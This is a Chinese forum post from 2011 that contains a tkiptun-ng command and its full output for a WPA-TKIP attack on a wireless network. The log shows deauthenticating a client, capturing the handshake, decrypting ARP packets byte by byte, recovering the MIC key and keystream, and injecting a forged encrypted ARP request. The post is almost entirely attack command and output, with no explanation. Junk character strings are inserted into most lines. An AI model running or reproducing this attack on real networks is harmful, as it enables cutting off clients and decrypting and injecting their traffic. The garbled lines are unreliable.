中尉
- 注册时间
- 2009-5-13
- 金币
- 584 个
- 威望
- 2 个
- 荣誉
- 0 个
尚未签到
|
Input: 输入
; I* l# ~* L3 w0 R7 Y- `8 p% l0 W: v2 ?6 ]: C
4 _' `5 c% n0 y7 Q. v; P# G8 N tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0
) w/ Y$ l/ W6 N* [/ s! C0 S/ f. N" s5 f
Output: 输出
/ q( q7 Z. V0 {1 J: Z) K* u0 U ]
The interface MAC (00:0E:2E:C5:81 3) doesn't match the specified MAC (-h).# z- D- L4 a1 q. h
ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D% c r1 T/ P9 `7 X5 _& @# q
Blub 2:38 E6 38 1C 24 15 1C CF
5 `" ~7 I6 D# w! P, E9 k! l7 ^ Blub 1:17 DD 0D 69 1D C3 1F EE : t/ h" ^. o5 H8 R3 Y
Blub 3:29 31 79 E7 E6 CF 8D 5E
) J% X3 j( r5 B- n4 x; m! u9 i 15:06:48 Michael Test: Successful' n4 j/ D1 F: i
15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9( o# ^/ c7 R$ l
15:06:48 Found specified AP% Z1 T) R4 ]' Z, W( r% N6 {
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
- T. h8 d* H0 ~% D3 k4 x 15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
0 e0 F. _+ }+ Q# y! ` 15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured
' s; k" y7 T- I 15:06:56 Waiting for an ARP packet coming from the Client...+ C- l2 I+ n% g9 e
Saving chosen packet in replay_src-0305-150705.cap* K: u, n* O& z4 m* y1 e, ?
15:07:05 Waiting for an ARP response packet coming from the AP...# H; ]/ i8 b2 }4 ]" m9 o2 n+ [) l
Saving chosen packet in replay_src-0305-150705.cap6 ]8 i) B* D: n! A
15:07:05 Got the answer!
7 F! Z# Y8 h& e9 ^ 15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.) R [1 E+ o |3 `% I% O& \: A# [4 C
1 y% l: x' f: `1 c5 x
15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms
, }; @8 Q1 }) Z5 t* m/ A: `. l$ J# ]; t 15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms3 z3 `1 h8 ]" o) G6 ^ r0 A
15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms
4 o# O6 R+ i* C5 Y+ H8 l' { 15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms
# w8 Z( Z$ }. B; z 15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms7 T* S( ~6 Z, ~: E Z3 ^/ N
15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms
! j" A1 v Y8 l! O 15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms
7 z+ F: S% E- L; g! X. J 15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms6 W* J- B& ^' [7 F$ X
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
1 h# s# `% B9 j9 B. w 15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms1 h9 H' V# q# h- e% D
15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms
n5 M, Y: w+ K0 s Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
; e1 `' @. K" J5 {+ O 15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms
+ Y A4 u5 \' X Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.; k* a% l% B2 h3 T5 e
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
2 e3 x! e; w% a 15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms! a0 s( A& w; {
15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms+ {1 N6 n; q. \* e5 B
15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms
3 @. {* f* Y+ L! t/ |$ B3 M4 j 15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms
) N+ B5 f: y+ l: r" }. A& ?! W 15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms$ _) g9 Q( U! a, P4 k9 A3 z
15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms
3 B7 o$ m, [( Z5 v7 E' a d 15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms
7 _; \2 F8 J# g2 n5 N 15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms
* Y* A+ N- c `: l4 s% k& c 15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms% a0 \, T8 Y+ M/ m, f
15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms
% O! d* D9 d2 v" ?& @% d: N- \ 15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms
@0 ^4 T% e) _+ p Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.& E4 C& x T4 f8 I4 C
15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms
5 H, o* I3 g9 [$ v Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
P5 e2 x& `; x9 ]7 j& j' h" n 15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms
9 _% d. } q1 B4 }6 i8 f 15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms a: }/ `- t: e6 g+ B
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.& S6 G7 d9 w( V3 D) {" R$ Z+ [) Y9 B. ]
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms2 y% P( ?; I* Z8 `: _
15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
3 L1 H+ r( [# O( A" f 15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms! h4 O7 C5 U9 A0 ?% {
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.$ R9 g: ]3 V) m" o0 X% ]5 \
15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms6 F. {) ^ M+ o- m
15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
: s( u3 M. W3 g, \) Q Sleeping for 60 seconds.36 bytes still unknown
/ @4 q, L! o6 I: y) s: B ARP Reply' g9 K: |. l4 X
Checking 192.168.x.y
1 x0 R: A& h! l$ }5 O. u" l! j0 i 15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66
- `' h5 E$ M, {6 D$ ^ 2 P5 U# [# \( p( x" K# ~1 P8 ~
Saving plaintext in replay_dec-0305-155411.cap% k9 v1 x& W' T2 ^- J
Saving keystream in replay_dec-0305-155411.xor
3 i+ `8 {1 B! j. `$ c 15:54:11 / o; m. c+ S f& O# ^, x$ w r. ~
Completed in 2816s (0.02 bytes/s)
: n9 n- S7 E& v$ K $ K& d( }' [3 P; L; B2 ]' a( u% r6 i
15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
' d& }6 X2 N. N$ L 15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112
% X6 h! K' r- A; P# _; w 15:54:11 Sent encrypted tkip ARP request to the client.+ `2 a9 M# b" t2 a: X$ S
15:54:11 Wait for the mic countermeasure timeout of 60 seconds. |
|
[复制链接]
IP卡
狗仔卡
发表于 2011-5-16 06:41
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡